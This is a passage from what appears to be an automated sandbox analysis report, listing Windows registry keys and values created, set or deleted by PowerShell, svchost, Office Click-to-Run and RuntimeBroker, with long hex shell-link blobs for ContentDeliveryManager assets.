Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1723659853" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 14 Aug 2024 18:24:14 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={D7E9F11A-84D7-47FC-A902-949C8C009CC0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\07406c0d-b3a4-4daa C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c2df8f22-48ef-47b5 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\124f038e-c3b3-41e9 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\82dcc277-57ed-4d1d C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\83c78cfc-b9d3-4552 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c63b2d5-91d3-4cc1 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\83c78cfc-b9d3-4552 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000001206943977eeda01e551784077eeda01e551784077eeda0131470c000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000e5914932000633538396536383765626662346334623265663036343737656261303431343538343434666662663137633138666437393265376638303532646266393131620000b20009000400efbe0e5914930e5914932e000000000000000000000000000000000000000000000000000d879000630035003800390065003600380037006500620066006200340063003400620032006500660030003600340037003700650062006100300034003100340035003800340034003400660066006200660031003700630031003800660064003700390032006500370066003800300035003200640062006600390031003100620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000426ebb4e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63353839653638376562666234633462326566303634373765626130343134353834343466666266313763313866643739326537663830353264626639313162000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006473657978756f6400000000000000005cc36eb49b56f545bab4b48e3a50d6c356916f9ace50ef11bfd9da2e3a28ca1b5cc36eb49b56f545bab4b48e3a50d6c356916f9ace50ef11bfd9da2e3a28ca1bd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003300390032003800380037003600340030002d0031003100380037003000350031003000340037002d0032003900300039003700350038003400330033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b58935fa000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b72e70e0-1598-4afa C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9ae09148-a8e8-4149 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9ae09148-a8e8-4149 = "\\\\?\\Volume{FA3589B5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c6e97c8ac3a0bbd5c26aaead5f642717b8fe81c75c9ddd5649a6aff8dde7ac80" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\83c78cfc-b9d3-4552 = cadc864077eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\136bdf30-4153-4fb9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d0bc8fc0-9270-4118 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\82dcc277-57ed-4d1d = ac02163e77eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da464137-eca9-4001 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d0bc8fc0-9270-4118 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c2df8f22-48ef-47b5 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\58231882-a9e2-4444 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\124f038e-c3b3-41e9 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b72e70e0-1598-4afa = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b72e70e0-1598-4afa = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000bb19883977eeda017046b93a77eeda017046b93a77eeda0173ff08000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000e5914932000393530326333386330316432613661313466633033383932366130303230643039643161316461303335353264626539303234303466643838616663613664370000b20009000400efbe0e5914930e5914932e0000000000000000000000000000000000000000000000000069fca500390035003000320063003300380063003000310064003200610036006100310034006600630030003300380039003200360061003000300032003000640030003900640031006100310064006100300033003500350032006400620065003900300032003400300034006600640038003800610066006300610036006400370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000426ebb4e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c39353032633338633031643261366131346663303338393236613030323064303964316131646130333535326462653930323430346664383861666361366437000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006473657978756f6400000000000000005cc36eb49b56f545bab4b48e3a50d6c352916f9ace50ef11bfd9da2e3a28ca1b5cc36eb49b56f545bab4b48e3a50d6c352916f9ace50ef11bfd9da2e3a28ca1bd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003300390032003800380037003600340030002d0031003100380037003000350031003000340037002d0032003900300039003700350038003400330033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b58935fa000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\83c78cfc-b9d3-4552 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b72e70e0-1598-4afa = 8d78d53a77eeda01 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c63b2d5-91d3-4cc1 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9ae09148-a8e8-4149 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000fbca983977eeda0175d0683c77eeda0175d0683c77eeda01ee630b000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000e5914932000633665393763386163336130626264356332366161656164356636343237313762386665383163373563396464643536343961366166663864646537616338300000b20009000400efbe0e5914930e5914932e00000000000000000000000000000000000000000000000000e8ae9700630036006500390037006300380061006300330061003000620062006400350063003200360061006100650061006400350066003600340032003700310037006200380066006500380031006300370035006300390064006400640035003600340039006100360061006600660038006400640065003700610063003800300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000426ebb4e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c633665393763